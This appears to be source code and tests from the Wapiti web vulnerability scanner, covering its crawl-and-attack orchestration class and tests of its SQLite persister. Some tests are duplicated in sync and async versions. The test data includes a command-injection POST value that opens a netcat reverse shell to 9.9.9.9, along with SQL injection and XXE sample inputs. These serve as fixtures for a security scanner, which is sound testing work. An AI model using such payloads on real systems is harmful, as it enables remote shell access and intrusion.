def test_persister_upload():
    try:
        os.unlink("/tmp/crawl.db")
    except FileNotFoundError:
        pass

    persister = SqlitePersister("/tmp/crawl.db")
    persister.set_root_url("http://httpbin.org/")

    simple_upload = Request(
        "http://httpbin.org/post?qs1",
        post_params=[["post1", "c"], ["post2", "d"]],
        file_params=[["file1", ["'fname1", "content"]], ["file2", ["fname2", "content"]]]
    )
    xml_upload = Request(
        "http://httpbin.org/post?qs1",
        post_params=[["post1", "c"], ["post2", "d"]],
        file_params=[["calendar", ["calendar.xml", "<xml>Hello there</xml"]]]
    )
    persister.add_request(simple_upload)
    persister.add_request(xml_upload)
    assert persister.count_paths() == 2

    stored_requests = set(persister.get_to_browse())
    assert simple_upload in stored_requests
    assert xml_upload in stored_requests

    for req in stored_requests:
        if req == simple_upload:
            assert req.file_params == simple_upload.file_params
            assert req.file_params[0] == ["file1", ["'fname1", "content"]]
            assert req.file_params[1] == ["file2", ["fname2", "content"]]
        else:
            assert req.file_params == xml_upload.file_params
            assert req.file_params[0] == ["calendar", ["calendar.xml", "<xml>Hello there</xml"]]

    naughty_file = Request(
        "http://httpbin.org/post?qs1",
        post_params=[["post1", "c"], ["post2", "d"]],
        file_params=[["calendar", ["calendar.xml", "<xml>XXE there</xml>"]]]
    )
    persister.add_vulnerability(1, "Command Execution", 1, naughty_file, "calendar", "<xml>XXE there</xml>")
    payload = next(persister.get_payloads())
    assert naughty_file == payload.evil_request
    assert payload.parameter == "calendar"
async def test_persister_upload():
    try:
        os.unlink("/tmp/crawl.db")
    except FileNotFoundError:
        pass

    persister = SqlitePersister("/tmp/crawl.db")
    persister.set_root_url("http://httpbin.org/")

    simple_upload = Request(
        "http://httpbin.org/post?qs1",
        post_params=[["post1", "c"], ["post2", "d"]],
        file_params=[["file1", ("'fname1", "content", "text/plain")], ["file2", ("fname2", "content", "text/plain")]]
    )
    xml_upload = Request(
        "http://httpbin.org/post?qs1",
        post_params=[["post1", "c"], ["post2", "d"]],
        file_params=[["calendar", ("calendar.xml", "<xml>Hello there</xml", "application/xml")]]
    )
    persister.add_request(simple_upload)
    persister.add_request(xml_upload)
    assert persister.count_paths() == 2

    stored_requests = set(persister.get_to_browse())
    assert simple_upload in stored_requests
    assert xml_upload in stored_requests

    respx.post("http://httpbin.org/post?qs1").mock(return_value=httpx.Response(200, text="Hello there"))
    crawler = AsyncCrawler("http://httpbin.org/")

    for req in stored_requests:
        await crawler.async_send(req)
        persister.add_request(req)
        if req == simple_upload:
            assert req.file_params == simple_upload.file_params
            assert req.file_params[0] == ["file1", ("'fname1", "content", "text/plain")]
            assert req.file_params[1] == ["file2", ("fname2", "content", "text/plain")]
        else:
            assert req.file_params == xml_upload.file_params
            assert req.file_params[0] == ["calendar", ("calendar.xml", "<xml>Hello there</xml", "application/xml")]

    naughty_file = Request(
        "http://httpbin.org/post?qs1",
        post_params=[["post1", "c"], ["post2", "d"]],
        file_params=[["calendar", ("calendar.xml", "<xml>XXE there</xml>", "application/xml")]]
    )
    persister.add_vulnerability(1, "Command Execution", 1, naughty_file, "calendar", "<xml>XXE there</xml>")
    payload = next(persister.get_payloads())
    assert naughty_file == payload.evil_request
    assert payload.parameter == "calendar"
    assert len(list(persister.get_forms(path="http://httpbin.org/post"))) == 2

    await crawler.close()
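# --- Illustrative sketch (not part of the original test suite) ---
# The async test above mocks httpbin.org with respx so no real network traffic
# happens. The helper below shows that mocking pattern in isolation; the route,
# request body and function name are hypothetical examples, not project code.
import httpx
import respx


@respx.mock
async def _example_mocked_post():
    # Register a route: any POST to this URL gets a canned 200 response.
    route = respx.post("http://httpbin.org/post?qs1").mock(
        return_value=httpx.Response(200, text="Hello there")
    )
    async with httpx.AsyncClient() as client:
        response = await client.post("http://httpbin.org/post?qs1", data={"post1": "c"})
    # The route records whether it was hit; the client saw only the mocked body.
    assert route.called
    assert response.text == "Hello there"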
class Wapiti:
    """This class parses the options from the command line and sets the modules
    and the HTTP engine accordingly. Launch Wapiti without arguments or with
    the "-h" option for more information."""

    REPORT_DIR = "report"
    HOME_DIR = os.getenv("HOME") or os.getenv("USERPROFILE")
    COPY_REPORT_DIR = os.path.join(HOME_DIR, ".wapiti", "generated_report")

    def __init__(self, root_url, scope="folder", session_dir=None, config_dir=None):
        self.target_url = root_url
        self.server = urlparse(root_url).netloc
        self.crawler = crawler.Crawler(root_url)
        self.target_scope = scope
        if scope == "page":
            self.crawler.scope = crawler.Scope.PAGE
        elif scope == "folder":
            self.crawler.scope = crawler.Scope.FOLDER
        elif scope == "domain":
            self.crawler.scope = crawler.Scope.DOMAIN
        elif scope == "punk":
            self.crawler.scope = crawler.Scope.PUNK
        else:
            self.crawler.scope = crawler.Scope.URL

        self.report_gen = None
        self.report_generator_type = "html"
        self.output_file = ""

        self.urls = []
        self.forms = []
        self.attacks = []

        self.color = 0
        self.verbose = 0
        self.module_options = None
        self.attack_options = {}
        self._start_urls = deque([self.target_url])
        self._excluded_urls = []
        self._bad_params = set()
        self._max_depth = 40
        self._max_links_per_page = 0
        self._max_files_per_dir = 0
        self._scan_force = "normal"
        self._max_scan_time = 0
        self._max_attack_time = 0
        self._bug_report = True

        if session_dir:
            SqlitePersister.CRAWLER_DATA_DIR = session_dir

        if config_dir:
            SqlitePersister.CONFIG_DIR = config_dir

        self._history_file = os.path.join(
            SqlitePersister.CRAWLER_DATA_DIR,
            "{}_{}_{}.db".format(
                self.server.replace(':', '_'),
                self.target_scope,
                md5(root_url.encode(errors="replace")).hexdigest()[:8]
            )
        )

        if not os.path.isdir(SqlitePersister.CRAWLER_DATA_DIR):
            os.makedirs(SqlitePersister.CRAWLER_DATA_DIR)

        self.persister = SqlitePersister(self._history_file)

    def _init_report(self):
        self.report_gen = get_report_generator_instance(self.report_generator_type.lower())

        self.report_gen.set_report_info(self.target_url, self.target_scope, gmtime(), WAPITI_VERSION)

        for vul in vulnerabilities:
            self.report_gen.add_vulnerability_type(
                vul.NAME,
                vul.DESCRIPTION,
                vul.SOLUTION,
                flatten_references(vul.REFERENCES)
            )

        for anomaly in anomalies:
            self.report_gen.add_anomaly_type(
                anomaly.NAME,
                anomaly.DESCRIPTION,
                anomaly.SOLUTION,
                flatten_references(anomaly.REFERENCES)
            )

        for additional in additionals:
            self.report_gen.add_additional_type(
                additional.NAME,
                additional.DESCRIPTION,
                additional.SOLUTION,
                flatten_references(additional.REFERENCES)
            )

    def _init_attacks(self):
        self._init_report()

        logger = ConsoleLogger()
        if self.color:
            logger.color = True

        print(_("[*] Loading modules:"))
        modules_list = sorted(module_name[4:] for module_name in attack.modules)
        print("\t {0}".format(", ".join(modules_list)))
        for mod_name in attack.modules:
            try:
                mod = import_module("wapitiCore.attack." + mod_name)
            except ImportError:
                print(_("[!] Could not find module {0}").format(mod_name))
                continue

            mod_instance = getattr(mod, mod_name)(self.crawler, self.persister, logger, self.attack_options)
            if hasattr(mod_instance, "set_timeout"):
                mod_instance.set_timeout(self.crawler.timeout)
            self.attacks.append(mod_instance)

        self.attacks.sort(key=attrgetter("PRIORITY"))

        for attack_module in self.attacks:
            attack_module.set_verbose(self.verbose)
            if attack_module.name not in attack.commons:
                attack_module.do_get = False
                attack_module.do_post = False

            if self.color == 1:
                attack_module.set_color()

        # Custom list of modules was specified
        if self.module_options is not None:
            # First deactivate all modules
            for attack_module in self.attacks:
                attack_module.do_get = False
                attack_module.do_post = False

            opts = self.module_options.split(",")

            for module_opt in opts:
                if module_opt.strip() == "":
                    continue

                method = ""
                if module_opt.find(":") > 0:
                    module_name, method = module_opt.split(":", 1)
                else:
                    module_name = module_opt

                # deactivate some module options
                if module_name.startswith("-"):
                    module_name = module_name[1:]
                    if module_name in ("all", "common"):
                        for attack_module in self.attacks:
                            if module_name == "all" or attack_module.name in attack.commons:
                                if not method:
                                    attack_module.do_get = attack_module.do_post = False
                                elif method == "get":
                                    attack_module.do_get = False
                                elif method == "post":
                                    attack_module.do_post = False
                    else:
                        found = False
                        for attack_module in self.attacks:
                            if attack_module.name == module_name:
                                found = True
                                if not method:
                                    attack_module.do_get = attack_module.do_post = False
                                elif method == "get":
                                    attack_module.do_get = False
                                elif method == "post":
                                    attack_module.do_post = False
                        if not found:
                            print(_("[!] Unable to find a module named {0}").format(module_name))
                # activate some module options
                else:
                    if module_name.startswith("+"):
                        module_name = module_name[1:]

                    if module_name in ("all", "common"):
                        for attack_module in self.attacks:
                            if module_name == "all" or attack_module.name in attack.commons:
                                if not method:
                                    attack_module.do_get = attack_module.do_post = True
                                elif method == "get":
                                    attack_module.do_get = True
                                elif method == "post":
                                    attack_module.do_post = True
                    else:
                        found = False
                        for attack_module in self.attacks:
                            if attack_module.name == module_name:
                                found = True
                                if not method:
                                    attack_module.do_get = attack_module.do_post = True
                                elif method == "get":
                                    attack_module.do_get = True
                                elif method == "post":
                                    attack_module.do_post = True
                        if not found:
                            print(_("[!] Unable to find a module named {0}").format(module_name))

    def update(self):
        """Update modules that implement an update method"""
        logger = ConsoleLogger()
        if self.color:
            logger.color = True

        for mod_name in attack.modules:
            mod = import_module("wapitiCore.attack." + mod_name)
            mod_instance = getattr(mod, mod_name)(self.crawler, self.persister, logger, self.attack_options)
            if hasattr(mod_instance, "update"):
                print(_("Updating module {0}").format(mod_name[4:]))
                mod_instance.update()
        print(_("Update done."))

    def browse(self):
        """Extract hyperlinks and forms from the webpages found on the website"""
        for resource in self.persister.get_to_browse():
            self._start_urls.append(resource)
        for resource in self.persister.get_links():
            self._excluded_urls.append(resource)
        for resource in self.persister.get_forms():
            self._excluded_urls.append(resource)

        stopped = False

        explorer = crawler.Explorer(self.crawler)
        explorer.max_depth = self._max_depth
        explorer.max_files_per_dir = self._max_files_per_dir
        explorer.max_requests_per_depth = self._max_links_per_page
        explorer.forbidden_parameters = self._bad_params
        explorer.qs_limit = SCAN_FORCE_VALUES[self._scan_force]
        explorer.verbose = (self.verbose > 0)
        explorer.load_saved_state(self.persister.output_file[:-2] + "pkl")

        self.persister.set_root_url(self.target_url)
        start = datetime.utcnow()

        try:
            for resource in explorer.explore(self._start_urls, self._excluded_urls):
                # Browsed URLs are saved one at a time
                self.persister.add_request(resource)
                if (datetime.utcnow() - start).total_seconds() > self._max_scan_time >= 1:
                    print(_("Max scan time was reached, stopping."))
                    break
        except KeyboardInterrupt:
            stopped = True

        print(_("[*] Saving scan state, please wait..."))

        # Not yet scanned URLs are all saved in one single time (bulk insert + final commit)
        self.persister.set_to_browse(self._start_urls)
        # Let's save explorer values (limits)
        explorer.save_state(self.persister.output_file[:-2] + "pkl")

        print('')
        print(_(" Note"))
        print("========")
        print(_("This scan has been saved in the file {0}").format(self.persister.output_file))

        if stopped:
            print(_("The scan will be resumed next time unless you pass the --skip-crawl option."))

    def attack(self):
        """Launch the attacks based on the preferences set by the command line"""
        self._init_attacks()

        for attack_module in self.attacks:
            start = datetime.utcnow()
            if attack_module.do_get is False and attack_module.do_post is False:
                continue

            print('')
            if attack_module.require:
                attack_name_list = [
                    attack.name for attack in self.attacks
                    if attack.name in attack_module.require and (attack.do_get or attack.do_post)
                ]
                if attack_module.require != attack_name_list:
                    print(_("[!] Missing dependencies for module {0}:").format(attack_module.name))
                    print(" {0}".format(
                        ",".join([attack for attack in attack_module.require if attack not in attack_name_list])
                    ))
                    continue

                attack_module.load_require(
                    [attack for attack in self.attacks if attack.name in attack_module.require]
                )

            attack_module.log_green(_("[*] Launching module {0}"), attack_module.name)

            already_attacked = self.persister.count_attacked(attack_module.name)
            if already_attacked:
                attack_module.log_green(
                    _("[*] {0} pages were previously attacked and will be skipped"),
                    already_attacked
                )

            generator = attack_module.attack()

            answer = "0"
            skipped = 0
            while True:
                try:
                    original_request_or_exception = next(generator)
                    if isinstance(original_request_or_exception, BaseException):
                        raise original_request_or_exception
                    if (datetime.utcnow() - start).total_seconds() > self._max_attack_time >= 1:
                        print(_("Max attack time was reached for module {0}, stopping.".format(attack_module.name)))
                        break
                except KeyboardInterrupt as exception:
                    print('')
                    print(_("Attack process was interrupted. Do you want to:"))
                    print(_("\tr) stop everything here and generate the (R)eport"))
                    print(_("\tn) move to the (N)ext attack module (if any)"))
                    print(_("\tq) (Q)uit without generating the report"))
                    print(_("\tc) (C)ontinue the current attack"))

                    while True:
                        try:
                            answer = input("? ").strip().lower()
                        except UnicodeDecodeError:
                            pass

                        if answer not in ("r", "n", "q", "c"):
                            print(_("Invalid choice. Valid choices are r, n, q and c."))
                        else:
                            break

                    if answer in ("r", "n"):
                        break

                    if answer == "c":
                        continue

                    # if answer is q, raise KeyboardInterrupt and it will stop cleanly
                    raise exception
                except (ConnectionError, Timeout, ChunkedEncodingError, ContentDecodingError):
                    sleep(1)
                    skipped += 1
                    continue
                except StopIteration:
                    break
                except Exception as exception:
                    # Catch every possible exception and print it
                    exception_traceback = sys.exc_info()[2]
                    print(exception.__class__.__name__, exception)
                    print_tb(exception_traceback)

                    if self._bug_report:
                        traceback_file = str(uuid1())
                        with open(traceback_file, "w") as traceback_fd:
                            print_tb(exception_traceback, file=traceback_fd)
                            print("{}: {}".format(exception.__class__.__name__, exception), file=traceback_fd)
                            print("Occurred in {} on {}".format(attack_module.name, self.target_url), file=traceback_fd)
                            print("{}. Requests {}. OS {}".format(WAPITI_VERSION, requests.__version__, sys.platform), file=traceback_fd)

                        try:
                            upload_request = Request(
                                "https://wapiti3.ovh/upload.php",
                                file_params=[["crash_report", [traceback_file, open(traceback_file, "rb").read()]]]
                            )
                            page = self.crawler.send(upload_request)
                            print(_("Sending crash report {} ... {}").format(traceback_file, page.content))
                        except RequestException:
                            print(_("Error sending crash report"))
                        os.unlink(traceback_file)
                else:
                    if original_request_or_exception and original_request_or_exception.path_id is not None:
                        self.persister.set_attacked(original_request_or_exception.path_id, attack_module.name)

            if hasattr(attack_module, "finish"):
                attack_module.finish()

            if skipped:
                print(_("{} requests were skipped due to network issues").format(skipped))

            # "r" means stop everything here and generate the report
            if answer == "r":
                break

        # if self.crawler.get_uploads():
        #     print('')
        #     print(_("Upload scripts found:"))
        #     print("----------------------")
        #     for upload_form in self.crawler.get_uploads():
        #         print(upload_form)

        if not self.output_file:
            if self.report_generator_type == "html":
                self.output_file = self.COPY_REPORT_DIR
            else:
                filename = "{}_{}".format(
                    self.server.replace(":", "_"),
                    strftime("%m%d%Y_%H%M", self.report_gen.scan_date)
                )

                if self.report_generator_type == "txt":
                    extension = ".txt"
                elif self.report_generator_type == "json":
                    extension = ".json"
                else:
                    extension = ".xml"

                self.output_file = filename + extension

        for payload in self.persister.get_payloads():
            if payload.type == "vulnerability":
                self.report_gen.add_vulnerability(
                    category=payload.category,
                    level=payload.level,
                    request=payload.evil_request,
                    parameter=payload.parameter,
                    info=payload.info
                )
            elif payload.type == "anomaly":
                self.report_gen.add_anomaly(
                    category=payload.category,
                    level=payload.level,
                    request=payload.evil_request,
                    parameter=payload.parameter,
                    info=payload.info
                )
            elif payload.type == "additional":
                self.report_gen.add_additional(
                    category=payload.category,
                    level=payload.level,
                    request=payload.evil_request,
                    parameter=payload.parameter,
                    info=payload.info
                )

        self.report_gen.generate_report(self.output_file)

        print('')
        print(_("Report"))
        print("------")
        print(_("A report has been generated in the file {0}").format(self.output_file))
        if self.report_generator_type == "html":
            print(_("Open {0} with a browser to see this report.").format(self.report_gen.final_path))

        # if self.http_engine.sslErrorOccured:
        #     print('')
        #     print(_("Warning: Wapiti came across some SSL errors during the scan, it maybe missed some webpages."))

    def set_timeout(self, timeout: float = 6.0):
        """Set the timeout used when waiting for an HTTP response"""
        self.crawler.timeout = timeout

    def set_verify_ssl(self, verify: bool = False):
        """Set whether SSL must be verified."""
        self.crawler.secure = verify

    def set_proxy(self, proxy: str = ""):
        """Set a proxy to use for HTTP requests."""
        self.crawler.set_proxy(proxy)

    def add_start_url(self, url: str):
        """Specify a URL to start the scan with. Can be called several times."""
        self._start_urls.append(url)

    def add_excluded_url(self, url_or_pattern: str):
        """Specify a URL to exclude from the scan. Can be called several times."""
        self._excluded_urls.append(url_or_pattern)

    def set_cookie_file(self, cookie: str):
        """Load session data from a cookie file"""
        if os.path.isfile(cookie):
            json_cookie = jsoncookie.JsonCookie()
            json_cookie.open(cookie)
            cookiejar = json_cookie.cookiejar(self.server)
            json_cookie.close()
            self.crawler.session_cookies = cookiejar

    def set_auth_credentials(self, auth_basic: tuple):
        """Set credentials to use if the website requires authentication."""
        self.crawler.credentials = auth_basic

    def set_auth_type(self, auth_method: str):
        """Set the authentication method to use."""
        self.crawler.auth_method = auth_method

    def add_bad_param(self, param_name: str):
        """Exclude a parameter from URLs (URLs with this parameter will be modified).
        This function can be called several times."""
        self._bad_params.add(param_name)

    def set_max_depth(self, limit: int):
        """Set how deep the scanner should explore the website"""
        self._max_depth = limit

    def set_max_links_per_page(self, limit: int):
        self._max_links_per_page = limit

    def set_max_files_per_dir(self, limit: int):
        self._max_files_per_dir = limit

    def set_scan_force(self, force: str):
        self._scan_force = force

    def set_max_scan_time(self, seconds: float):
        self._max_scan_time = seconds

    def set_max_attack_time(self, seconds: float):
        self._max_attack_time = seconds

    def set_color(self):
        """Put colors in the console output (terminal must support colors)"""
        self.color = 1

    def verbosity(self, verbose: int):
        """Define the level of verbosity of the output."""
        self.verbose = verbose

    def set_bug_reporting(self, value: bool):
        self._bug_report = value

    def set_attack_options(self, options: dict = None):
        self.attack_options = options if isinstance(options, dict) else {}

    def set_modules(self, options=""):
        """Activate or deactivate (default) all attacks"""
        self.module_options = options

    def set_report_generator_type(self, report_type="xml"):
        """Set the format of the generated report. Can be html, json, txt or xml"""
        self.report_generator_type = report_type

    def set_output_file(self, output_file: str):
        """Set the filename where the report will be written"""
        self.output_file = output_file

    def add_custom_header(self, key: str, value: str):
        self.crawler.add_custom_header(key, value)

    def flush_attacks(self):
        self.persister.flush_attacks()

    def flush_session(self):
        self.persister.close()
        try:
            os.unlink(self._history_file)
        except FileNotFoundError:
            pass

        try:
            os.unlink(self.persister.output_file[:-2] + "pkl")
        except FileNotFoundError:
            pass

        self.persister = SqlitePersister(self._history_file)

    def count_resources(self) -> int:
        return self.persister.count_paths()

    def has_scan_started(self) -> bool:
        return self.persister.has_scan_started()

    def have_attacks_started(self) -> bool:
        return self.persister.have_attacks_started()
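# --- Illustrative sketch (not part of the original module) ---
# How the Wapiti class above could be driven programmatically, using only the
# public methods defined in this file. The target URL, module selection and
# output path are placeholder values, not defaults taken from the project.
def _example_programmatic_scan():
    wap = Wapiti("http://target.example/", scope="folder")
    wap.set_timeout(10.0)
    wap.set_modules("xss")                        # comma-separated list, parsed by _init_attacks() above
    wap.set_report_generator_type("json")
    wap.set_output_file("/tmp/wapiti_report.json")

    wap.browse()                                  # crawl the target and persist the found resources
    wap.attack()                                  # run the active modules, then generate the report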
async def test_persister_basic():
    url = "http://httpbin.org/?k=v"
    respx.get(url).mock(return_value=httpx.Response(200, text="Hello world!"))

    crawler = AsyncCrawler("http://httpbin.org/")
    try:
        os.unlink("/tmp/crawl.db")
    except FileNotFoundError:
        pass

    persister = SqlitePersister("/tmp/crawl.db")
    persister.set_root_url("http://httpbin.org/")

    simple_get = Request("http://httpbin.org/?k=v")
    simple_post = Request(
        "http://httpbin.org/post?var1=a&var2=b",
        post_params=[["post1", "c"], ["post2", "d"]]
    )
    persister.set_to_browse([simple_get, simple_post])

    assert persister.get_root_url() == "http://httpbin.org/"
    assert persister.count_paths() == 2
    assert not len(list(persister.get_links()))
    assert not len(list(persister.get_forms()))
    assert not len(list(persister.get_payloads()))

    stored_requests = set(persister.get_to_browse())
    assert simple_get in stored_requests
    assert simple_post in stored_requests

    # If some requests are stored, it means the scan was started
    assert persister.has_scan_started()
    assert not persister.has_scan_finished()
    assert not persister.have_attacks_started()

    for req in stored_requests:
        if req == simple_get:
            await crawler.async_send(req)
            # Add the sent request
            persister.add_request(req)
            assert req.path_id == 1
            assert persister.get_path_by_id(1) == req
            break

    # Should be one now as the link was crawled
    assert len(list(persister.get_links())) == 1
    # We still have two entries in paths though as the resource just got updated
    assert persister.count_paths() == 2

    persister.set_attacked(1, "xss")
    assert persister.count_attacked("xss") == 1
    assert persister.have_attacks_started()

    naughty_get = Request("http://httpbin.org/?k=1%20%OR%200")
    persister.add_vulnerability(1, "SQL Injection", 1, naughty_get, "k", "OR bypass")

    assert next(persister.get_payloads())
    persister.flush_attacks()
    assert not persister.have_attacks_started()
    assert not len(list(persister.get_payloads()))
    persister.flush_session()
    assert not persister.count_paths()

    naughty_post = Request(
        "http://httpbin.org/post?var1=a&var2=b",
        post_params=[["post1", "c"], ["post2", ";nc -e /bin/bash 9.9.9.9 9999"]]
    )
    persister.add_vulnerability(1, "Command Execution", 1, naughty_post, "post2", ";nc -e /bin/bash 9.9.9.9 9999")
    payload = next(persister.get_payloads())
    persister.close()
    assert naughty_post == payload.evil_request
    assert payload.parameter == "post2"
    await crawler.close()